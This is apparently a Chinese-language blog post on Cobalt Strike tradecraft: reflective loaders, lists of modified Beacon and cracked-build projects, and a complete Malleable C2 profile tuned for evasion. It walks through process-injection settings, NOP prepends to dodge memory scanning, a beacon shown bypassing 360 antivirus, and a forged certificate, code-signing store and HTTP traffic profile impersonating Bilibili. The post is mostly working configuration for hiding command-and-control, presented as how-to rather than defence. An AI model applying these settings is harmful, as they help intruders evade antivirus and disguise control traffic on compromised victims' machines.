<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span>如果执行的功能崩溃，可以保护原有的beacon。</span><br><span class="line"><span class="number">2.</span>从历史上看，该方案使 x86 信标无缝启动 x64 后期开发任务。这一点很关键，因为 Beacon 直</span><br><span class="line">到 <span class="number">2016</span> 年才构建 x64。</span><br><span class="line"><span class="number">3.</span>某些功能可以针对特定的远程进程。这允许 post-ex 操作在不同的上下文中发生，而无需在其他</span><br><span class="line">上下文中迁移或生成有效负载。</span><br><span class="line"><span class="number">4.</span>此设计决策将您的 post-ex 操作生成的大量混乱（线程、可疑内容）保留在您的 Beacon 进程空</span><br><span class="line">间之外。</span><br></pre></td></tr></table></figure>

<p>这种早期设计理念比先进的办法在现在反倒成为了问题，因为大部分安全厂商对注入都有所防备</p>
<p>比如WinAPI里面的CreateRemoteThread，又是0环hook，又是SSDT hook</p>
<h1 id="UDRL"><a href="#UDRL" class="headerlink" title="UDRL"></a>UDRL</h1><p>User Defined Reflective Loader，它允许你自定义 ReflectiveLoader ，也就是反射loader。 我们植入的beacon，实际上到最后他都是一个dll，名为beacon.dll，功能实现都在这个dll里面，他是真 正的payload。我们知道加载一个dll，<strong>一般来说可以使用winapi loadlibary</strong> ，但是这样太容易被侦察 到，用系统api会留下很多痕迹。 那么还有一种方式加载dll就是通过自写反射加载loader去加载，<strong>实际上是自写了一个loadlibary</strong>，<strong>并且 是无需落地的</strong>，他的实现关键之处也是需要修正重定位表和导入表一类的，具体实现可以谷歌搜索：反 射dll加载。 对于Cobalt Strike而言呢，在4.4版本以前，反射加载的loader是写死了的，有非常多的特征，</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">现有项目比较好用的有：</span><br><span class="line">https:<span class="comment">//github.com/boku7/BokuLoader</span></span><br><span class="line">https:<span class="comment">//github.com/mgeeky/ElusiveMice</span></span><br><span class="line">https:<span class="comment">//github.com/Cracked5pider/KaynStrike</span></span><br></pre></td></tr></table></figure>

<h1 id="一些简单的二开"><a href="#一些简单的二开" class="headerlink" title="一些简单的二开"></a>一些简单的二开</h1><p>对你的cs进行一些简单的二开也能够帮助你规避一些空间探测引擎或者各种扫描，谷歌搜索：cs二开。 一般来说有这些地方进行简单的修改就可以实现：</p>
<p><strong>有一个项目<a target="_blank" rel="noopener" href="https://gitee.com/cream492/Awesome-CobaltStrike">Awesome-CobaltStrike</a>，Gitee上貌似已经封了，讲了很多关于CS怎么二开在怎么用的问题</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/CYJoe-Cyclone/Awesome-CobaltStrike#:~:text=A%20Cobalt%20Strike%20Beacon%20Object%20File">https://github.com/CYJoe-Cyclone/Awesome-CobaltStrike#:~:text=A%20Cobalt%20Strike%20Beacon%20Object%20File</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">修改监听不返回任何数据(带user-agent的请求302，不带的不返回任何数据)</span><br><span class="line">添加teamserver认证白名单限制登陆IP</span><br><span class="line">去除checksum8特征</span><br><span class="line">免杀VT全绿</span><br><span class="line">默认证书已替换</span><br><span class="line">防止stage被扫</span><br><span class="line">去除listenerConfig特征字符串</span><br><span class="line">cs去除beaconeye特征</span><br><span class="line">修复CVE-2022-39197</span><br><span class="line">cs修复错误路径泄漏stage</span><br><span class="line">增加谷歌动态密码(身份验证器)</span><br><span class="line">修复cs4.5的foreign派生bug</span><br><span class="line">添加中文汉化翻译</span><br><span class="line">内置破解</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">当然，最有效的方式仍然是二开beacon端，但相对来说既繁琐难度也相对较大，已有可参考的项目有：</span><br><span class="line">https://github.com/WBGlIl/ReBeacon_Src</span><br><span class="line">https://github.com/darkr4y/geacon</span><br><span class="line">https://github.com/mai1zhi2/SharpBeacon</span><br><span class="line">https://github.com/Z3ratu1/geacon_plus</span><br></pre></td></tr></table></figure>

<h1 id="C2-profile的继续深入"><a href="#C2-profile的继续深入" class="headerlink" title="C2 profile的继续深入"></a>C2 profile的继续深入</h1><p>对于从来都没有接触过C2 profile编写的小白，最好的学习方法就是参照别人已经写好的模板，感谢r0leG3n7师傅的文章</p>
<p><a target="_blank" rel="noopener" href="https://github.com/threatexpress/malleable-c2">https://github.com/threatexpress/malleable-c2</a></p>
<h2 id="基础配置"><a href="#基础配置" class="headerlink" title="基础配置"></a>基础配置</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">#C2 profile配置文件的名称，设置该名称不会影响Beacon的流量，只是为了方便区分不同流量的配置文件，配置文件的名称会显示在CS的报告中</span><br><span class="line">set sample_name &quot;C2_profile_For_FreeBuf&quot;;</span><br><span class="line"></span><br><span class="line">#是否使用stager分阶段载荷</span><br><span class="line">set host_stage &quot;true&quot;;</span><br><span class="line"></span><br><span class="line">#设置上线后的睡眠时间,单位毫秒，不可以设置为0，设置为0可能导致Beacon无法上线，一般感觉别太长也别太短，5到6秒左右</span><br><span class="line">set sleeptime &quot;5983&quot;;</span><br><span class="line"></span><br><span class="line">#设置抖动值，单位百分比，取值区间0-99，用于调节beacon回调和睡眠的频率</span><br><span class="line">set jitter &quot;55&quot;;</span><br><span class="line"></span><br><span class="line">#设置数据抖动大小。设置后，请求时会添加小于设置值的随机长度的随机字符串。</span><br><span class="line">set data_jitter &quot;77&quot;;</span><br><span class="line"></span><br><span class="line">#设置发送请求时的User-Agent头</span><br><span class="line">set useragent &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20&quot;;</span><br></pre></td></tr></table></figure>

<h2 id="传输数据最大值的配置"><a href="#传输数据最大值的配置" class="headerlink" title="传输数据最大值的配置"></a>传输数据最大值的配置</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#单次任务可传输数据的最大值，用execute-assembly执行.NET程序集的文件大小要小于这个值</span><br><span class="line">set tasks_max_size &quot;2097152&quot;;</span><br><span class="line"></span><br><span class="line">#单次任务通过代理可传输数据的最大值</span><br><span class="line">set tasks_proxy_max_size &quot;921600&quot;;</span><br><span class="line"></span><br><span class="line">#单次任务通过dns代理可传输数据的最大值，这个值不宜设置过大，dns代理的流量很容易被安全设备侦测到</span><br><span class="line">set tasks_dns_proxy_max_size &quot;71500&quot;;</span><br></pre></td></tr></table></figure>

<h2 id="TCP-Beacon配置"><a href="#TCP-Beacon配置" class="headerlink" title="TCP Beacon配置"></a>TCP Beacon配置</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#在 tcp 信息前追加设定的字符,CS4.1版本以后可以设置</span><br><span class="line">set tcp_frame_header &quot;&quot;;</span><br><span class="line"></span><br><span class="line">#设置tcp的端口，别搞默认</span><br><span class="line">set tcp_port &quot;37500&quot;;</span><br></pre></td></tr></table></figure>

<h2 id="SMB-Beacon配置"><a href="#SMB-Beacon配置" class="headerlink" title="SMB Beacon配置"></a>SMB Beacon配置</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">#在 smb 信息前追加设定的字符</span><br><span class="line">set smb_frame_header &quot;&quot;;</span><br><span class="line"></span><br><span class="line">#设置SMB管道名称</span><br><span class="line">set pipename &quot;chrome+####&quot;;</span><br><span class="line"></span><br><span class="line">set pipename_stager &quot;srvsvc-1-7-7-0####&quot;;</span><br></pre></td></tr></table></figure>

<h2 id="SSH-Beacon配置"><a href="#SSH-Beacon配置" class="headerlink" title="SSH Beacon配置"></a>SSH Beacon配置</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">#设置连接SSH时显示的信息</span><br><span class="line">set ssh_banner &quot;Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)&quot;;</span><br><span class="line"></span><br><span class="line">#设置SSH管道名称</span><br><span class="line">set ssh_pipename &quot;pcsvc-####&quot;;</span><br></pre></td></tr></table></figure>

<h2 id="Http全局设置"><a href="#Http全局设置" class="headerlink" title="Http全局设置"></a>Http全局设置</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">http-config &#123;    </span><br><span class="line"># 增加headers    </span><br><span class="line">set headers &quot;Date, Server, Content-Length, Keep-Alive, Connection, Content-Type&quot;;    header &quot;Server&quot; &quot;Apache&quot;;    header &quot;Keep-Alive&quot; &quot;timeout=10, max=100&quot;;    header &quot;Connectio</span><br><span class="line">n&quot; &quot;Keep-Alive&quot;;    </span><br><span class="line"></span><br><span class="line"># set &quot;true&quot; if teamserver is behind redirector    </span><br><span class="line">set trust_x_forwarded_for &quot;false&quot;;  </span><br><span class="line"></span><br><span class="line"># 阻止不正常的useragent,如：curl*,lynx*,wget*</span><br><span class="line">set block_useragents &quot;curl*,lynx*,wget*&quot;; </span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Process-Inject"><a href="#Process-Inject" class="headerlink" title="Process-Inject"></a>Process-Inject</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">process-inject &#123;    </span><br><span class="line">#CS4.7版本以后可以设置当前进程涉及BOF内容的内存分配方法，可选的内存分配方法有: HeapAlloc, MapViewOfFile和VirtualAlloc    </span><br><span class="line">set bof_allocator &quot;HeapAlloc&quot;;     </span><br><span class="line">set bof_reuse_memory &quot;true&quot;;    </span><br><span class="line"></span><br><span class="line"># 设置使用远程分配内存的Window API函数    </span><br><span class="line">set allocator &quot;VirtualAllocEx&quot;;    </span><br><span class="line">#set allocator &quot;NtMapViewOfSection&quot;;</span><br><span class="line">    #设置内存分配的最小值    </span><br><span class="line">    set min_alloc &quot;7814&quot;;</span><br><span class="line">    #是否分配内存属性为R(读)W(写)X(执行)的内存，一般设置为false，因为一般正常程序不会分配RWX属性的内存    </span><br><span class="line">    set userwx    &quot;false&quot;;    </span><br><span class="line">    #注入payload前是否分配内存属性为R(读)W(写)X(执行)的内存，一般设置为false    </span><br><span class="line">    set startrwx &quot;false&quot;;</span><br><span class="line">        #在注入的x86架构payload前添加指令，0x90对应的汇编代码为NOP，NOP是无操作指令，添加不会影响shellcode执行，一定程度上能规避内存扫描    </span><br><span class="line">        transform-x86 &#123;        prepend &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;; # NOP, NOP!    &#125;</span><br><span class="line">    #在注入的x64架构payload前添加指令    </span><br><span class="line">    transform-x64 &#123;        prepend &quot;\x90\x90\x90\x90\x90\x90\x90\x90\x90&quot;; # NOP, NOP!    &#125;</span><br><span class="line">    # 指明如何在远程进程中执行函数代码，这里一般是得到某个函数地址后加相对偏移得到另一个函数的地址    </span><br><span class="line">    execute &#123;        </span><br><span class="line">    CreateThread &quot;ntdll.dll!RtlUserThreadStart+0x2285&quot;;        		    NtQueueApcThread-s;        </span><br><span class="line">    SetThreadContext;        </span><br><span class="line">    CreateRemoteThread;        </span><br><span class="line">    CreateRemoteThread &quot;kernel32.dll!LoadLibraryA+0x1000&quot;;        RtlCreateUserThread;    &#125;</span><br></pre></td></tr></table></figure>

<p>上面的配置完之后，生成个bin试试，可能看不清楚，但是文件头已经从4d5a转为了909090</p>
<p><img src="https://s2.loli.net/2024/10/10/Hs6xTc3JWiYnMCb.png" alt="image-20241009214342308.png"></p>
<p>生成的bin文件和Loader一起，在Win10下的360环境，上线</p>
<p><img src="https://s2.loli.net/2024/10/10/TEfCuXxBMjSVd6v.png" alt="1728518337941.png"></p>
<p><img src="https://s2.loli.net/2024/10/10/arvQTDLNxRMseCm.png" alt="image-20241010075934499.png"></p>
<p><img src="https://s2.loli.net/2024/10/10/GN17iHQLctF6Bgl.png" alt="image-20241010080509497.png"></p>
<p>至少现在过了360的免杀，这里提一下，过360 QVM的静态还是要给软件补上信息（签名，软件信息等），具体参考熵与自签名这篇博客</p>
<h2 id="http-certificate"><a href="#http-certificate" class="headerlink" title="http-certificate"></a>http-certificate</h2><p>假设我们已经上线了某个站点的服务，那么CS同时还是提供了将流量混淆的方法</p>
<p><img src="https://s2.loli.net/2024/10/10/a4Cbg5JuMTVDtlj.png" alt="image-20241010081318542.png"></p>
<p>按照b站这个证书来一份http-certificate  配置</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">https-certificate  </span><br><span class="line">&#123;</span><br><span class="line">set CN       &quot;*.bilibli.com&quot;; #填公用名</span><br><span class="line">set O        &quot;上海幻电信息科技有限公司&quot;; #填目标组织名称</span><br><span class="line">set C        &quot;CN&quot;; #填国家,CN代表中国</span><br><span class="line">set L        &quot;Beijing&quot;; #填组织所在的地市</span><br><span class="line">set OU       &quot;GlobalSign nv-sa&quot;; #证书颁发机构的名称,是组织这一项</span><br><span class="line">set ST       &quot;CA&quot;; #State or Province</span><br><span class="line">set validity &quot;365&quot;; #填证书有效期天数</span><br><span class="line">&#125;</span><br><span class="line">#设置，修改成你的证书名称和证书密码</span><br><span class="line">code-signer&#123;</span><br><span class="line">    set keystore &quot;bilibili.store&quot;;</span><br><span class="line">    set password &quot;1qazxsw2&quot;;</span><br><span class="line">    set alias &quot;bilibili&quot;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们像上面所说的一样继续生成证书</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">keytool -genkey -alias bilibili -keyalg RSA -validity 36500 -keystore bilibli.store</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2024/10/10/uzeD5KPc8EZbrsk.png" alt="image-20241010083210768.png"></p>
<p>把这生成的store文件放到C2 profile同一个文件夹下</p>
<p><img src="https://s2.loli.net/2024/10/10/SFnzJfutjDohsig.png" alt="image-20241010083749477.png"></p>
<p>在C2 profile里面把上面的配置加上，然后重新启动teamserver</p>
<p><img src="https://s2.loli.net/2024/10/10/HCXPr2ZlEdpoSDR.png" alt="image-20241010095808339.png"></p>
<h2 id="http-get-http-post"><a href="#http-get-http-post" class="headerlink" title="http-get&amp;http-post"></a>http-get&amp;http-post</h2><p>我们需要用到下面这个项目去生成我们的http-get&amp;http-post</p>
<p><a target="_blank" rel="noopener" href="https://github.com/CodeXTF2/Burp2Malleable">https://github.com/CodeXTF2/Burp2Malleable</a></p>
<p>打开我们的Brupsuite，给b站抓个包，然后把这个包保存为request.txt,response.txt</p>
<p><img src="https://s2.loli.net/2024/10/10/65AZbxgoXeGtjBO.png" alt="image-20241010113556726.png"></p>
<p>用这个项目生成一个http-get和http-post的样例</p>
<p><img src="https://s2.loli.net/2024/10/10/stR4Sln2KGBIrcw.png" alt="image-20241010115417941.png"></p>
<p>最后填入我们自己的C2 prpfile，里面，重新启动teamserver</p>
<p><img src="https://s2.loli.net/2024/10/10/XBRxPt1KQd5wEcV.png" alt="image-20241010151617186.png"></p>

  </div>
</article>



    </div>
    
      <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/posts/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="http://github.com/sergodeeva">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Stage-Stageless"><span class="toc-number">1.</span> <span class="toc-text">Stage&amp;Stageless</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Shellcode"><span class="toc-number">2.</span> <span class="toc-text">Shellcode</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#C2-profile"><span class="toc-number">3.</span> <span class="toc-text">C2 profile</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AF%81%E4%B9%A6%E7%94%9F%E6%88%90"><span class="toc-number">3.1.</span> <span class="toc-text">证书生成</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BAC2-profile%E6%96%87%E4%BB%B6"><span class="toc-number">3.1.1.</span> <span class="toc-text">创建C2.profile文件</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BC%96%E5%86%99Profile"><span class="toc-number">3.2.</span> <span class="toc-text">编写Profile</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Fork-Run"><span class="toc-number">4.</span> <span class="toc-text">Fork&amp;Run</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#UDRL"><span class="toc-number">5.</span> <span class="toc-text">UDRL</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E7%AE%80%E5%8D%95%E7%9A%84%E4%BA%8C%E5%BC%80"><span class="toc-number">6.</span> <span class="toc-text">一些简单的二开</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#C2-profile%E7%9A%84%E7%BB%A7%E7%BB%AD%E6%B7%B1%E5%85%A5"><span class="toc-number">7.</span> <span class="toc-text">C2 profile的继续深入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE"><span class="toc-number">7.1.</span> <span class="toc-text">基础配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BC%A0%E8%BE%93%E6%95%B0%E6%8D%AE%E6%9C%80%E5%A4%A7%E5%80%BC%E7%9A%84%E9%85%8D%E7%BD%AE"><span class="toc-number">7.2.</span> <span class="toc-text">传输数据最大值的配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TCP-Beacon%E9%85%8D%E7%BD%AE"><span class="toc-number">7.3.</span> <span class="toc-text">TCP Beacon配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SMB-Beacon%E9%85%8D%E7%BD%AE"><span class="toc-number">7.4.</span> <span class="toc-text">SMB Beacon配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSH-Beacon%E9%85%8D%E7%BD%AE"><span class="toc-number">7.5.</span> <span class="toc-text">SSH Beacon配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Http%E5%85%A8%E5%B1%80%E8%AE%BE%E7%BD%AE"><span class="toc-number">7.6.</span> <span class="toc-text">Http全局设置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Process-Inject"><span class="toc-number">7.7.</span> <span class="toc-text">Process-Inject</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#http-certificate"><span class="toc-number">7.8.</span> <span class="toc-text">http-certificate</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#http-get-http-post"><span class="toc-number">7.9.</span> <span class="toc-text">http-get&amp;http-post</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/10/08/Cobalt%20Strike/"><i class="fa fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/10/08/Cobalt%20Strike/&text=CS专题"><i class="fa fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/10/08/Cobalt%20Strike/&is_video=false&description=CS专题"><i class="fa fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CS专题&body=Check out this article: http://example.com/2024/10/08/Cobalt%20Strike/"><i class="fa fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/10/08/Cobalt%20Strike/&name=CS专题&description="><i class="fa fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
      <ul>
        <li id="toc"><a class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa fa-list fa-lg" aria-hidden="true"></i> TOC</a></li>
        <li id="share"><a class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa fa-share-alt fa-lg" aria-hidden="true"></i> Share</a></li>
        <li id="top" style="display:none"><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a></li>
        <li id="menu"><a class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa fa-bars fa-lg" aria-hidden="true"></i> Menu</a></li>
      </ul>
    </div>

  </div>
</div>

    
    <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2024 John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/posts/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="http://github.com/sergodeeva">Projects</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

</body>
</html>
<!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<link rel="stylesheet" href="/lib/meslo-LG/styles.css">


<link rel="stylesheet" href="/lib/justified-gallery/justifiedGallery.min.css">


<!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/jquery.justifiedGallery.min.js"></script>


<script src="/js/main.js"></script>



    <!-- Google Analytics -->
    <script type="text/javascript">
        (function(i,s,o,g,r,a,m) {i['GoogleAnalyticsObject']=r;i[r]=i[r]||function() {
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-37473492-6', 'auto');
        ga('send', 'pageview');
    </script>



